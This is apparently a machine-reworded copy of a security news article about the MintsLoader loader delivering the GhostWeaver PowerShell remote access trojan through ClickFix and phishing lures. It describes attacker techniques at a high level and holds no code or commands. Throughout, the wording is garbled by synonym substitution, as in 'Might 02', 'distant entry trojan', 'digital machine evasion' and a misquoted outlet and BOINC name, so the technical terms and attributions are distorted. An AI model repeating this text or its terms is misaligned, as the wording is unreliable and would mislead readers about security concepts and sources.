Might 02, 2025Ravie LakshmananMalware / Risk Intelligence
The malware loader referred to as MintsLoader has been used to ship a PowerShell-based distant entry trojan referred to as GhostWeaver.
“MintsLoader operates via a multi-stage an infection chain involving obfuscated JavaScript and PowerShell scripts,” Recorded Future’s Insikt Group stated in a report shared with The Hacker Information.
“The malware employs sandbox and digital machine evasion strategies, a site era algorithm (DGA), and HTTP-based command-and-control (C2) communications.”
Phishing and drive-by obtain campaigns distributing MintsLoader have been detected within the wild since early 2023, per Orange Cyberdefense. The loader has been noticed delivering numerous follow-on payloads like StealC and a modified model of the Berkeley Open Infrastructure for Community Computing (BOINC) shopper.
The malware has additionally been put to make use of by menace actors working e-crime companies like SocGholish (aka FakeUpdates) and LandUpdate808 (aka TAG-124), distributing by way of phishing emails concentrating on the commercial, authorized, and vitality sectors and pretend browser replace prompts.
In a notable twist, current assault waves have employed the more and more prevalent social engineering tactic referred to as ClickFix to trick web site guests into copying and executing malicious JavaScript and PowerShell code. The hyperlinks to ClickFix pages are distributed by way of spam emails.
“Though MintsLoader capabilities solely as a loader with out supplementary capabilities, its main strengths lie in its sandbox and digital machine evasion strategies and a DGA implementation that derives the C2 area based mostly on the day it’s run,” Recorded Future stated.
These options, coupled with obfuscation strategies, allow menace actors to hinder evaluation and complicate detection efforts. The first duty of the malware is to obtain the next-stage payload from a DGA area over HTTP by the use of a PowerShell script.
GhostWeaver, based on a report from TRAC Labs earlier this February, is designed to keep up persistent communication with its C2 server, generate DGA domains based mostly on a fixed-seed algorithm based mostly on the week quantity and yr, and ship extra payloads within the type of plugins that may steal browser knowledge and manipulate HTML content material.
“Notably, GhostWeaver can deploy MintsLoader as a further payload by way of its sendPlugin command. Communication between GhostWeaver and its command-and-control (C2) server is secured via TLS encryption utilizing an obfuscated, self-signed X.509 certificates embedded instantly throughout the PowerShell script, which is leveraged for client-side authentication to the C2 infrastructure,” Recorded Future stated.
The disclosure comes as Kroll revealed makes an attempt made by menace actors to safe preliminary entry via an ongoing marketing campaign codenamed CLEARFAKE that leverages ClickFix to lure victims into operating MSHTA instructions that finally deploy the Lumma Stealer malware.
Discovered this text attention-grabbing? Comply with us on Twitter and LinkedIn to learn extra unique content material we publish.
